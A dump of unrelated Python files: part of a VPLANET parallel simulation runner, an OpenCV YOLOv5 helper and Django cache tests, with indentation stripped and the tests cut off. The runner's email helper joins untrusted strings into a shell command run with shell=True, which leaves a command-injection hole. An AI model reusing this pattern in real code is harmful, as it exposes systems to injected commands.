message = "echo " + Body + " | " + 'mail -s ' + '"'+ Title + '" ' + email
sub.Popen(message , shell=True)
def GetDir(input_file):
""" Give it input file and returns name of folder where simulations are located. """
infiles = []
# gets the folder name with all the sims
with open(input_file, 'r') as vpl:
content = [line.strip().split() for line in vpl.readlines()]
for line in content:
if line:
if line[0] == 'destfolder':
folder_name = line[1]
if line[0] == 'file':
infiles.append(line[1])
if folder_name is None:
print("Name of destination folder not provided in file '%s'."
"Use syntax 'destfolder <foldername>'"%inputf)
if os.path.isdir(folder_name) == False:
print("ERROR: Folder", folder_name, "does not exist in the current directory.")
exit()
return folder_name, infiles
def CreateCP(checkpoint_file,input_file,quiet,sims):
with open(checkpoint_file,'w') as cp:
cp.write('Vspace File: ' + os.getcwd() + '/' + input_file + '\n')
cp.write('Total Number of Simulations: '+ str(len(sims)) + '\n')
for f in range(len(sims)):
cp.write(sims[f] + " " + "-1 \n")
cp.write('THE END \n')
def ReCreateCP(checkpoint_file,input_file,quiet,sims):
if quiet == False:
print('WARNING: multi-planet checkpoint file already exists!')
print('Checking if checkpoint file is corrupt...')
datalist = []
with open(checkpoint_file, 'r') as f:
for newline in f:
datalist.append(newline.strip().split())
for l in datalist:
if l[1] == '0':
l[1] = '-1'
with open(checkpoint_file, 'w') as f:
for newline in datalist:
f.writelines(' '.join(newline)+'\n')
## parallel worker to run vplanet ##
def par_worker(checkpoint_file,infiles,system_name,logfile,quiet,bigplanet,lock):
while True:
lock.acquire()
datalist = []
data = {}
with open(checkpoint_file, 'r') as f:
for newline in f:
datalist.append(newline.strip().split())
folder = ''
for l in datalist:
if l[1] == '-1':
folder = l[0]
l[1] = '0'
break
if not folder:
lock.release()
return
with open(checkpoint_file, 'w') as f:
for newline in datalist:
f.writelines(' '.join(newline)+'\n')
lock.release()
os.chdir(folder)
#runs vplanet on folder and writes the output to the log file
with open('vplanet_log','a+') as vplf:
vplanet = sub.Popen("vplanet vpl.in", shell=True, stdout=sub.PIPE, stderr=sub.PIPE, universal_newlines=True)
return_code = vplanet.poll()
for line in vplanet.stderr:
vplf.write(line)
for line in vplanet.stdout:
vplf.write(line)
lock.acquire()
datalist = []
with open(checkpoint_file, 'r') as f:
for newline in f:
datalist.append(newline.strip().split())
if return_code is None:
for l in datalist:
if l[0] == folder:
l[1] = '1'
break
if quiet == False:
print(folder, "completed")
if bigplanet == True:
single_folder = folder.split('/')[-1]
HDF5_File = single_folder + '.hdf5'
data = {}
CreateHDF5(data, system_name, infiles, logfile, quiet, HDF5_File)
else:
for l in datalist:
if l[0] == folder:
l[1] = '-1'
break
if quiet == False:
print(folder, "failed")
with open(checkpoint_file, 'w') as f:
for newline in datalist:
f.writelines(' '.join(newline)+'\n')
lock.release()
os.chdir("../../")
if __name__ == "__main__":
max_cores = mp.cpu_count()
parser = argparse.ArgumentParser(description="Using multi-processing to run a large number of simulations")
parser.add_argument("-c","--cores", type=int, default=max_cores, help="The total number of processors used")
parser.add_argument("-q","--quiet", action="store_true", help="No command line output for multi-planet")
parser.add_argument("-bp","--bigplanet", action="store_true" ,help="Runs bigplanet and creates the HDF5 files alongside running mutlt-planet")
parser.add_argument("-m","--email",type=str, help="Mails user when multi-planet is completed")
parser.add_argument("InputFile", help="name of the vspace file")
args = parser.parse_args()
try:
if sys.version_info >= (3, 0):
help = sub.getoutput("vplanet -h")
else:
help = sub.check_output(["vplanet", "-h"])
except OSError:
raise Exception("Unable to call VPLANET. Is it in your PATH?")
parallel_run_planet(args.InputFile,args.cores,args.quiet,args.bigplanet,args.email)
|
utils_v5.py
|
""""
Miscellaneous function to run OpenCV DNN YoloV5
"""
import cv2 as cv
import time
import sys
import numpy as np
class prepDetect:
"""
Variables that will have an initial values that will be updated will be created in the class"""
frame=None
conf_thresh, NMS_THRESHOLD,score_thresh=0.4, 0.4,0.25
def __init__(self, class_path, weight_onnx, INPUT_WIDTH, INPUT_HEIGHT):
self.class_path=class_path #as .txt file
self.vid_path=None
self.weight_onnx=weight_onnx #path to weight
self.INPUT_WIDTH, self.INPUT_HEIGHT = INPUT_WIDTH, INPUT_HEIGHT
self.outs=None
self.INPUT_WIDTH, self.INPUT_HEIGHT= 640,640
self.conf_thresh, self.NMS_THRESHOLD,self.score_thresh
#print(f'input w, h {self.INPUT_WIDTH, self.INPUT_HEIGHT}')
###Dataset##
def load_capture(self):
capture = cv.VideoCapture(self.vid_path)
return capture
def formatFrame(self, frame):
""" Creates a black square canvas around the frame"""
prepDetect.frame=frame
row, col, _ = prepDetect.frame.shape
_max = max(col, row)
self.frame_reshaped = np.zeros((_max, _max, 3), np.uint8)
self.frame_reshaped[0:row, 0:col] = prepDetect.frame
self.frame_reshaped[0:row, 0:col] = prepDetect.frame
#print(f'resized frame shape check', self.frame_reshaped.shape)
return self.frame_reshaped
#####Model
def load_classes(self):
self.class_list = []
with open(self.class_path, "r") as f:
self.class_list = [cname.strip() for cname in f.readlines()]
return self.class_list
def model(self):
"""
Builds model once
"""
net = cv.dnn.readNet(self.weight_onnx)
print("Running on CPU")
net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
return net
def detect(self, image, net):#(image, net):
""" Calls predict on each frame
image is likely the resized_reshaped image"""
blob = cv.dnn.blobFromImage(image, 1/255.0, (self.INPUT_WIDTH, self.INPUT_HEIGHT), swapRB=True, crop=False)
net.setInput(blob)
preds = net.forward()
return preds
#######NMS
def detectNMS(self, outs, image, conf_thresh, score_thresh, nms_threshold):
""""
image is likely the resized_reshaped image
"""
self.outs=outs
prepDetect.conf_thresh, prepDetect.NMS_THRESHOLD,prepDetect.score_thresh=conf_thresh, nms_threshold, score_thresh
#print(f'cns: {prepDetect.conf_thresh, prepDetect.NMS_THRESHOLD,prepDetect.score_thresh}')
class_ids = []
confidences = []
boxes = []
#print('nms outs', len(outs))
rows = self.outs.shape[0]
image_width, image_height, _ = image.shape
x_factor = image_width / self.INPUT_WIDTH
y_factor = image_height / self.INPUT_HEIGHT
for r in range(rows):
row = self.outs[r]
confidence = row[4]
if confidence >= prepDetect.conf_thresh:
classes_scores = row[5:]
_, _, _, max_indx = cv.minMaxLoc(classes_scores)
class_id = max_indx[1]
if (classes_scores[class_id] > prepDetect.score_thresh):
confidences.append(confidence)
class_ids.append(class_id)
x, y, w, h = row[0].item(), row[1].item(), row[2].item(), row[3].item()
left = int((x - 0.5 * w) * x_factor)
top = int((y - 0.5 * h) * y_factor)
width = int(w * x_factor)
height = int(h * y_factor)
box = np.array([left, top, width, height])
boxes.append(box)
#print('nms boxes', boxes)
indexes = cv.dnn.NMSBoxes(boxes, confidences, prepDetect.score_thresh, prepDetect.NMS_THRESHOLD)
#print(f'nms idx {indexes}')
result_class_ids = []
result_confidences = []
result_boxes = []
for i in indexes:
result_confidences.append(confidences[i])
result_class_ids.append(class_ids[i])
result_boxes.append(boxes[i])
return result_class_ids, result_confidences, result_boxes
##################Video Capture
import cv2, queue, threading, time
import logging
from logging.handlers import RotatingFileHandler
from logging.config import fileConfig
class VideoCapture:
r"""
This custom function creates a separate thread that caches
and clears the 'internal' buffer retained
by the cv2.VideoCapture() object.
The buffering creates about 30 seconds
lag in between frames being analyzed and imshow() plot.
Implementing this function solves that problem.
"""
def __init__(self, name):
self.name=name
self.cap = cv2.VideoCapture(self.name)
self.q = None
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read frames as soon as they are available, keeping only most recent one
def _reader(self):
log_file='camera_status.log'
fileConfig('./persondetectapp/src/model_data/config/config_cam_logfile.config')
logger = logging.getLogger(__name__)
##################
open_time = time.time()
self.cap.open(self.name)
logger.warning('1_cap.open() duration: {}'.format(time.time()-open_time))
##################
while True:
if not self.cap.isOpened():
self.cap.release()
time.sleep(2)
##################
open_time = time.time()
self.cap.open(self.name)
logger.warning('2_cap.open() duration: {}'.format(time.time()-open_time))
continue
else:
vid_time = time.time()
ret, frame = self.cap.read()
if not ret:
self.cap.open(self.name)
#break
continue
self.q = frame
logger.warning("1_video capture_empty queue time. {}".format(time.time()-vid_time))
#print(f'Is {self.name} camera open? : {self.cap.isOpened()}')
def read(self):
return self.q#.get()
# Returns the height and width of camera frame.
def framesize(self):
return [self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT), self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)]
#raw points are stored as xi,yi sequence and comma delimited not in tuples that we need.
def coordsFormatter(path2=''):
"""
This functions seeks to convert.
example raw format is in string format:
[6,52.29,498.24,178.577,450.882,304.863] where first item is drawing style(polygon, point etc).
The rest is x,y,x,y,x,y coordinates.
This function:
Watches the working directory
Asserts the csv file exists in the right directory. Needs a single file in the dir.
Excludes the first and last two characters, then splits the string to make them eligible for numerical formating
Appends each list into a container
Subset each as tuple(x,y)
returns a list of list of coordinates as tuple(x,y)
"""
import os
import glob
import csv
data_path=glob.glob(os.path.join(path2,'*.csv'))
print('filename', data_path[0])
assert os.path.exists(data_path[0]), 'Needs the redzone region .csv file inside /rz_coords directory?'
with open(data_path[0], newline='') as csvfile:
reader = csv.DictReader(csvfile)
coords_all=[]
print('reader', reader)
for idx, row in enumerate(reader):
if idx>8:
str_coords = list(row.values())[1][-2] #subset for list of coords
listx=[float(x) for x in str_coords[1:-2].split(',')[1:]]
coords_all.append(listx)
real_coords=[]
for j in coords_all:
coords = [j[i:i + 2] for i in range(0, len(j), 2)]
real_coords.append(coords)
print('real coords', real_coords)
return real_coords
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core import signals
from django.core.cache import cache, caches, CacheKeyWarning, DEFAULT_CACHE_ALIAS
from django.db import connection, connections, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (TestCase, TransactionTestCase, RequestFactory,
override_settings)
from django.test.signals import setting_changed
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertEqual(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
